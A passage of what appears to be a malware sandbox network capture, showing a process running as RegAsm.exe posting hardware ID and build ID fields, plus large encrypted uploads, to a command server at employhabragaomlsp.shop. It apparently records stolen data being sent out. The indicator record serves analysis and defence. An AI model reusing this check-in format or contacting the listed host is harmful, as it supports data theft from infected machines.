                                2024-05-23 22:22:16 UTC1369INData Raw: 62 38 32 64 77 64 4f 42 4b 6d 4b 36 44 43 66 49 61 57 58 6c 4a 73 52 34 42 63 6c 79 6b 6e 4d 35 43 51 69 4b 70 4e 43 48 6f 33 46 73 35 76 44 42 6e 59 4d 69 62 6f 41 70 4a 4f 4d 47 4e 4c 63 2b 33 6d 6f 58 31 53 6e 4d 4a 57 70 56 59 2f 4f 70 6d 4f 7a 65 61 30 4f 7a 70 61 43 47 79 48 59 68 33 57 78 79 74 6b 78 35 72 6e 4b 4c 4a 31 79 73 47 64 51 6e 5a 31 56 6e 39 36 72 65 6f 61 41 44 62 38 32 55 77 64 4f 42 51 32 79 61 4a 33 50 47 42 52 2f 4f 50 70 35 6f 44 39 42 6e 39 43 64 6e 56 57 66 33 71 74 50 4f 78 57 4d 49 67 4a 53 4b 79 34 30 53 52 37 6b 6e 53 73 67 31 4e 76 55 77 37 6b 4d 38 30 69 50 51 5a 44 45 5a 4d 4c 50 67 79 37 79 66 4f 46 62 6c 38 4a 37 46 71 78 45 31 75 67 77 6e 79 48 73 30 2f 54 7a 55 5a 6a 2f 35 54 49 45 32 4b 51 4d 69 6f 66 79 64 2f 64 70
                                Data Ascii: b82dwdOBKmK6DCfIaWXlJsR4BclyknM5CQiKpNCHo3Fs5vDBnYMiboApJOMGNLc+3moX1SnMJWpVY/OpmOzea0OzpaCGyHYh3Wxytkx5rnKLJ1ysGdQnZ1Vn96reoaADb82UwdOBQ2yaJ3PGBR/OPp5oD9Bn9CdnVWf3qtPOxWMIgJSKy40SR7knSsg1NvUw7kM80iPQZDEZMLPgy7yfOFbl8J7FqxE1ugwnyHs0/TzUZj/5TIE2KQMiofyd/dp


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.649740188.114.96.34436472C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:16 UTC288OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 1237
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:16 UTC1237OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:16 UTC808INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:16 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=6sv23npr5h3egr66cb3duhkd10; expires=Mon, 16-Sep-2024 16:08:55 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kdc8curgIesYxCCWaygU1ivzLOoqw6aLnz8RZ3jZvm0hgVytSF1cIkyrLoTiPEnlO6g5Uyls6YaS2HoZ%2FXzbGzyzQvlAsmrJLrPV1N9LcqoVHoQ4XP0M1QeRbildo8U1nMGqe3yS8Gf8Zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871972ab64382-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.649741188.114.96.3443500C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:16 UTC290OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 566526
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:16 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:16 UTC15331OUTData Raw: 3b 5a 91 6a 2b dc 17 ab c1 e5 98 6b a8 77 2e 3f ba e3 3b fd a7 a4 cb 6b 05 8d 48 1f d8 d3 03 51 bf 6d 9c 8e 55 1e cc 4e 48 50 d9 5b cf 5a d4 0b 3b 1d f9 70 f6 50 9b 26 84 9e f7 79 a7 02 95 37 79 c5 42 2e 28 d1 45 6a 09 82 ca 66 73 95 0a 00 5f 71 b3 c9 7a f1 d1 e1 49 75 1e 66 96 b9 f4 4b 15 7f 28 bd 6c 6f 78 d6 73 d1 54 22 53 10 41 dd 70 11 fe f5 32 cc 11 2c 57 df 3c 37 fc b3 83 95 f1 8a 3e bb ca 0b 76 93 00 d5 33 12 2c f3 2d 66 61 2d 70 5b d6 f3 a9 ab e9 f1 37 65 64 ee f5 a6 b5 b3 d6 10 82 55 d7 eb 07 5f ae d8 23 a8 ca 16 ff df c3 98 bd 58 18 19 8c 21 6b b3 a7 01 c4 bd 6a 36 1f 76 05 96 88 36 b9 79 15 33 3c 1d c7 aa 30 57 97 a5 da cf 0c e5 dd c2 e7 33 b4 f3 a6 ba 2d 40 3e 0e d3 8b 84 7b 7f 3b f5 cd 42 d4 d7 63 01 aa 99 b2 d1 fb 32 6c cb 30 92 6d a1 a4 7d
                                Data Ascii: ;Zj+kw.?;kHQmUNHP[Z;pP&y7yB.(Ejfs_qzIufK(loxsT"SAp2,W<7>v3,-fa-p[7edU_#X!kj6v6y3<0W3-@>{;Bc2l0m}
                                2024-05-23 22:22:16 UTC15331OUTData Raw: f7 96 71 73 9a 16 d2 33 be 33 fe 53 cd 2c 28 e2 a9 63 f3 03 c0 3d f7 93 d5 f5 93 d7 40 1f 0d ff 79 cc 5b 79 4c 34 3d 46 73 c7 f5 57 5f bd 2e fa 51 af b2 b3 13 c6 4a 5d 66 88 e2 78 46 fa f1 da c9 63 92 48 38 88 6f ec ca e5 63 ff 3c 0b 7d 9b 9e eb dc 64 7f 11 65 29 15 02 ee 53 ee 2f 3f 96 ce 72 7a a4 87 e3 13 53 3c c4 dd 2d 06 97 d0 0c 43 09 50 b2 db 64 4f e0 19 3c 3e e1 c2 d2 d0 3f f1 a2 a7 8a 22 f7 17 24 79 c0 70 a5 ee 8b f2 15 c1 1f 03 fd b9 f5 fa 43 3f ac 05 e9 c5 91 d2 c2 c2 b3 95 ae a1 26 bc a2 ef d1 84 a7 4d 70 43 f1 58 33 4e 69 dc 1e 04 7e d0 e0 4b 78 47 88 08 7b 61 a8 a4 c0 30 eb 8c f2 a2 ea b6 54 b0 72 8e ff f9 b4 8b b8 36 d4 63 7d 62 f6 de bd 3d 2d bf 79 a4 d7 30 0f df 5e bb ee ee 72 c3 e2 eb 28 e9 7b b5 db 0b 4b c3 85 fb 0e 05 88 6a 64 de 04 b8
                                Data Ascii: qs33S,(c=@y[yL4=FsW_.QJ]fxFcH8oc<}de)S/?rzS<-CPdO<>?"$ypC?&MpCX3Ni~KxG{a0Tr6c}b=-y0^r({Kjd
                                2024-05-23 22:22:16 UTC15331OUTData Raw: 6c ee 64 59 7f 90 8b 66 67 e2 e7 09 61 ae 5b 95 fd c5 c5 23 5b ae 29 e2 29 e2 af d4 66 9f 14 33 cb 95 ff dd 88 f4 e3 ca 73 72 68 0c eb 5f 1d b2 df 0c 3a c6 5b a8 b7 3c 50 a8 99 c3 58 fb fa dd 2a f6 10 9d 87 9a 8b 3e e5 e0 b8 ea 14 7e 68 63 c0 fd be e2 3d cd 45 27 f9 e4 a8 4f 1a 2f 5b 7e 62 6f de da 74 52 ea f9 d4 fb c6 48 9d 1e dc 97 01 c8 75 f0 5a 29 6a 72 eb e5 c6 bb 31 2d 34 cb 60 b6 93 33 70 4b 67 5d 40 22 2e ef 47 06 b7 2e fa 93 a2 f1 23 b8 be dd df 41 14 d4 fc 0c ee 3b fd 57 1d 87 3f c3 92 de 9b 2d 52 28 71 89 1d be d6 ae 69 af 01 8c 60 93 c3 c2 71 4f c2 0f 94 2d de a2 df e0 03 d0 9c c4 01 6b 62 2a 67 8f 32 e9 e4 dc a2 ea a6 41 35 83 79 61 44 26 e6 45 52 68 d4 a8 10 45 e8 44 6d cb 8a 81 fc 83 47 31 8d c1 35 c5 59 7f e9 ed c7 fc c5 77 b4 63 cf 44 e8
                                Data Ascii: ldYfga[#[))f3srh_:[<PX*>~hc=E'O/[~botRHuZ)jr1-4`3pKg]@".G.#A;W?-R(qi`qO-kb*g2A5yaD&ERhEDmG15YwcD
                                2024-05-23 22:22:16 UTC15331OUTData Raw: 1d bf 0c ce 0a 16 9e 3c 4f b7 12 ba 25 95 53 a3 1f a3 15 93 58 45 bf 70 72 1a fc f0 87 de 9a 62 95 42 62 11 7f c1 c1 e5 ff 1a fd 10 50 78 97 bf 30 0f 73 01 03 b6 d0 c0 c0 07 9a 37 47 c8 32 a7 18 21 d2 ad aa cf 20 a9 1e af 97 be 55 87 90 79 d0 70 04 45 3f 3a f7 83 7e 36 85 d1 10 de 27 8a 1f 79 eb 6b ac cf f1 56 eb aa e0 e0 57 74 0d 6c 5f 7c ee 98 93 bc 2a 2e 88 90 79 fc d0 c4 39 d8 03 df 28 31 94 9c 2b 84 70 59 13 a7 b1 2c 60 9b 21 bd 74 66 28 bb 18 f0 02 69 c6 2b 31 1e 11 f0 1e 7f f4 45 f5 f6 4a ba 03 d5 44 c6 e4 24 7f 39 78 96 5d 70 19 0d f3 09 a8 83 97 b9 36 13 d0 29 3e ec da 93 1f 55 a9 a3 c8 1c 6c 5e 2c fe e9 86 a8 3d e3 58 6a 8a 38 de 5f 3b b3 82 b3 0f 1b 59 22 ef 00 65 fa 80 12 2f d1 37 6d 42 f7 49 35 c6 c0 90 4e eb f6 cc fb d1 c4 55 de f7 b2 d6 a6
                                Data Ascii: <O%SXEprbBbPx0s7G2! UypE?:~6'ykVWtl_|*.y9(1+pY,`!tf(i+1EJD$9x]p6)>Ul^,=Xj8_;Y"e/7mBI5NU
                                2024-05-23 22:22:16 UTC15331OUTData Raw: bc 6a d0 da 3f 60 7b 8e 5e 6a 33 9e b9 31 29 79 41 5c df 77 c5 d5 eb 20 d5 6b 56 49 2e 22 50 e8 30 a9 d9 31 8c 3c 92 5d 68 33 32 af b8 5f b4 ba ca f2 6b a7 b1 ff 45 ed 49 a3 45 77 af 9e 06 a3 57 98 68 d0 5c c4 99 fc 75 b0 ce f5 a6 24 4b 44 b8 f2 4c 92 bb 5a 0c e9 c6 a8 20 a5 06 3e c3 7a 10 71 53 6c 03 cb 6e fd 45 4f c6 8e 47 a4 17 80 31 83 4d 7d b9 66 3d de f7 72 cb b8 c0 d3 a4 9e a8 10 cb 73 b7 1c 77 dd 28 60 d9 ba 65 98 57 19 ef 52 3a 47 93 5c 88 a1 a6 32 97 4f c6 59 59 29 65 28 f7 c5 66 88 89 c5 cb 7c 59 fd 59 9f c3 e4 e5 ff 41 3a 4f bb 39 8b b9 2f 3b a9 b7 b9 ef 1c 6b 2b 43 e8 93 9c d6 12 78 12 d7 66 00 9f 65 bb a9 32 4a 25 9f 29 24 a9 0b f0 d5 84 fd 62 35 fc 23 52 65 e2 84 ab ca ef 26 78 0b 1c f2 e6 74 9a 3a 25 4a 3d 5b 95 42 d1 ff 65 ce b5 06 16 73
                                Data Ascii: j?`{^j31)yA\w kVI."P01<]h32_kEIEwWh\u$KDLZ >zqSlnEOG1M}f=rsw(`eWR:G\2OYY)e(f|YYA:O9/;k+Cxfe2J%)$b5#Re&xt:%J=[Bes
                                2024-05-23 22:22:16 UTC15331OUTData Raw: 89 9c 31 78 f5 3f bc 64 6a 4e 31 5a 44 e0 87 b9 3f 4a 53 bb 4d 06 fe ea 21 e0 f7 29 35 10 88 2d fd f2 cc bb 33 ef ba 9a 7a 99 7d ea cc 60 e6 35 ea 1d a1 0a e0 ef 87 ee 3e 4d 35 ff 4a 04 bf cb 7d 97 1e 3d a6 ce be 95 d3 de bf 8b 08 9a 0d c1 da 3d 19 78 12 67 8f 27 cd f9 6c 68 c9 c1 16 8b 9b e6 e9 b6 1e 5c 9d bd d9 d7 a8 91 15 a4 c6 d6 33 11 1f 27 2f 6f 68 9d a3 47 c3 b2 58 1c db 62 43 8b 44 3d c1 6a b9 ce 69 69 cf bc 4a 4e d9 90 ba 0e 1d 4c 88 72 f7 7d ba 6d ce 23 99 18 55 b5 cd c1 c0 cd 67 b8 5a 23 d9 af c9 23 b9 f2 8c 24 ec e9 a4 3d 52 26 bb eb f4 13 24 b4 43 f3 83 00 13 36 f2 28 9e 11 80 ba 22 83 cf a0 0a 10 2e 39 d1 67 a6 c9 e1 6f 74 ed 9c e0 79 5d 84 9f 0b d8 41 2f 25 61 bf 5c 09 13 a4 1c 1a 52 50 4e 2b e5 fa 1d be 27 75 62 dc c3 03 94 fe 23 f2 6f c6
                                Data Ascii: 1x?djN1ZD?JSM!)5-3z}`5>M5J}==xg'lh\3'/ohGXbCD=jiiJNLr}m#UgZ##$=R&$C6(".9goty]A/%a\RPN+'ub#o
                                2024-05-23 22:22:16 UTC15331OUTData Raw: 9d 7c 87 1c 6e e2 aa 43 7b 08 2e 0a 91 99 fd 97 81 4d a5 d3 39 bd 7c e6 bb 0d f7 20 fc 3e 97 71 18 3d 0b 8d ea 7f 29 d7 07 82 f1 38 20 0f 3c c0 be a6 cd 17 6a 4f 92 ac 0a 4d 79 6d 4a f6 6d 00 c8 c1 fd ef 03 ce 83 1c de 39 63 27 41 b2 ef c3 54 b4 f6 58 60 9f df 0d 8f e1 12 a8 42 2f bf 5e 0d 22 97 ce fd 5a ef cb 8b 4d 4a b6 c5 05 a0 fb db 5c d6 c7 70 59 71 1b 6d a2 eb 99 bc f9 85 ba 8b ba 77 25 98 32 c0 61 c5 f0 9f 00 4e 14 c3 db ac 19 c9 38 73 62 ec 09 cf 70 c9 a2 e5 80 0e 5c 95 65 b3 bc e8 ab 8f 79 ce 79 c0 ee 8e ec 2d be 9d 10 41 69 18 62 fd 3b 87 5b 6d b8 e4 3a 0b 81 06 16 cc 0c 47 3a 65 de be 1b ed 26 3e 5f b4 bb bc ad 2d a5 7c 2f 77 7d 63 8e d7 ad 56 c5 09 a1 d8 7e 2f d2 67 c8 38 46 b1 ee 65 6b 40 20 6a 99 d5 e3 25 9c 26 16 3a f1 f8 f7 5f bf 12 b5 66
                                Data Ascii: |nC{.M9| >q=)8 <jOMymJm9c'ATX`B/^"ZMJ\pYqmw%2aN8sbp\eyy-Aib;[m:G:e&>_-|/w}cV~/g8Fek@ j%&:_f
                                2024-05-23 22:22:16 UTC15331OUTData Raw: db a3 b8 7a 91 89 c8 84 00 e5 45 f9 cd e1 7a 6e a2 0e 83 58 c1 66 4a a2 98 2d ab d5 bd 95 bc 71 91 77 0b 6e f1 71 e6 70 e2 ec 00 76 16 52 45 c8 a8 1e b9 19 ba 8f ac 42 72 6b b7 f5 14 2b 7c fc f7 df f4 3a 74 fe 57 97 23 54 69 ec fe d9 57 f3 5a 68 f0 7e da 9c 0f 90 b3 0d b8 a7 29 28 c4 da b3 df e0 ca b6 0c 1f 7a 20 fa bc ad e7 1c 5b 47 ca 5b 0f 24 dc a7 a5 f9 71 45 03 c0 e6 1e 06 73 ad 3e 92 c8 20 32 4c 34 d7 19 12 be 24 05 d1 4b 81 5d 86 a8 90 0a 63 04 31 1e 16 42 94 64 f9 ae dc 72 3d 42 0b 9b 2d 0a a9 d1 6c 5d 53 c3 be 2b 01 dd ab 5e 59 d1 0e 48 f0 34 20 ed 8d 5b 8d 4d a7 bf b2 87 c0 a7 3d a6 ae db 24 49 d9 75 26 e8 d8 9f 2b 79 9a 75 ca 02 37 7a 53 db 6d 9c a3 57 9b d7 61 4f 91 c6 69 86 3c 38 e9 b9 ba 7d 7c e4 7d 0c 69 8a 9b 14 61 7e 1f e3 44 2d 95 70 70
                                Data Ascii: zEznXfJ-qwnqpvREBrk+|:tW#TiWZh~)(z [G[$qEs> 2L4$K]c1Bdr=B-l]S+^YH4 [M=$Iu&+yu7zSmWaOi<8}|}ia~D-pp
                                2024-05-23 22:22:16 UTC15331OUTData Raw: de 2f 4c 15 be ee d5 1c c3 bb 41 e0 9e b6 91 9e 46 82 6f ce a7 59 69 7c e5 45 6d fc 5e 25 e3 cf 1d d5 68 19 28 e9 b3 93 07 6c 7e 47 4e 3e 12 13 19 bc f9 d7 3c 7f 78 cf c3 fa 84 88 75 21 2b a4 5b 7d ab e3 6c 36 cc 96 64 09 a3 80 fc af d1 fc 1b d6 ce 2c 83 a3 57 58 22 e0 e9 0e e7 5f c9 17 8f e4 38 0b 33 32 6d e9 66 c6 9b 78 b6 38 ca aa ca 95 5f d7 29 d5 42 7a 79 4b db c8 9e a2 da 13 8a 0f 05 1b 4f 90 1e 6a 93 ca 35 aa 10 e4 ad f8 da fd d1 53 5d 9b 11 ba ba e0 93 e8 b1 c7 ff 7d 4c 96 8c 25 f2 94 15 13 35 c5 1b 14 e9 0d 65 2b 45 cb df b1 32 73 9e 15 d5 17 7e 78 87 d7 cf 64 2e b0 37 b8 f6 31 9f 0c 46 c3 e6 5a ca c3 89 5e 7f 33 37 46 4b d8 c1 81 a3 be 73 94 01 8b 3f 6b 9b 5c a7 7c 8b 5d 26 1d 14 56 36 16 9f 20 c6 5c 23 e0 62 0e 25 bc 1e 37 3f fe 3e b1 80 f3 8b
                                Data Ascii: /LAFoYi|Em^%h(l~GN><xu!+[}l6d,WX"_832mfx8_)BzyKOj5S]}L%5e+E2s~xd.71FZ^37FKs?k\|]&V6 \#b%7?>
                                2024-05-23 22:22:20 UTC816INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:20 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=k06tueifeatdgvh7ccvfiakqpq; expires=Mon, 16-Sep-2024 16:08:59 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TdTTCDmLXpqI3IS8NpWWWeX4bZbXIj%2Bdq3wO8bVWsNYeqWCLdctXzF0hCNQDDwwA9ZSdHIM%2Bj4CGuYCER36RvrWJ32lhhVVwhmiNinY%2B%2BDMP6ubzRD9jZzPVzxY%2FgXUGUTwPCOWDPhWENg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871986d510c9e-EWR
                                alt-svc: h3=":443"; ma=86400


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.649742188.114.96.34435920C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:16 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 12854
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:16 UTC12854OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:17 UTC812INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:17 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=ds0nkea9rpn8db901rfhctfj11; expires=Mon, 16-Sep-2024 16:08:56 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZ0fq2BaojGDUS05P9c%2BrTCL8BSBKcdRKv%2FwfTko3TOJbN7faaag7dZOjUTKhRsLNZJnEMf4rPIj2e9mWoCsl5LcL3aGacrbIuPVF5q5zbLSnK15ArVVGXdTZLgEmRkhuPfJgv%2BoK1SKrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8888719aec0d4264-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.649743188.114.96.34436472C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:17 UTC290OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 566526
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:17 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:17 UTC15331OUTData Raw: 3b 5a 91 6a 2b dc 17 ab c1 e5 98 6b a8 77 2e 3f ba e3 3b fd a7 a4 cb 6b 05 8d 48 1f d8 d3 03 51 bf 6d 9c 8e 55 1e cc 4e 48 50 d9 5b cf 5a d4 0b 3b 1d f9 70 f6 50 9b 26 84 9e f7 79 a7 02 95 37 79 c5 42 2e 28 d1 45 6a 09 82 ca 66 73 95 0a 00 5f 71 b3 c9 7a f1 d1 e1 49 75 1e 66 96 b9 f4 4b 15 7f 28 bd 6c 6f 78 d6 73 d1 54 22 53 10 41 dd 70 11 fe f5 32 cc 11 2c 57 df 3c 37 fc b3 83 95 f1 8a 3e bb ca 0b 76 93 00 d5 33 12 2c f3 2d 66 61 2d 70 5b d6 f3 a9 ab e9 f1 37 65 64 ee f5 a6 b5 b3 d6 10 82 55 d7 eb 07 5f ae d8 23 a8 ca 16 ff df c3 98 bd 58 18 19 8c 21 6b b3 a7 01 c4 bd 6a 36 1f 76 05 96 88 36 b9 79 15 33 3c 1d c7 aa 30 57 97 a5 da cf 0c e5 dd c2 e7 33 b4 f3 a6 ba 2d 40 3e 0e d3 8b 84 7b 7f 3b f5 cd 42 d4 d7 63 01 aa 99 b2 d1 fb 32 6c cb 30 92 6d a1 a4 7d
                                Data Ascii: ;Zj+kw.?;kHQmUNHP[Z;pP&y7yB.(Ejfs_qzIufK(loxsT"SAp2,W<7>v3,-fa-p[7edU_#X!kj6v6y3<0W3-@>{;Bc2l0m}
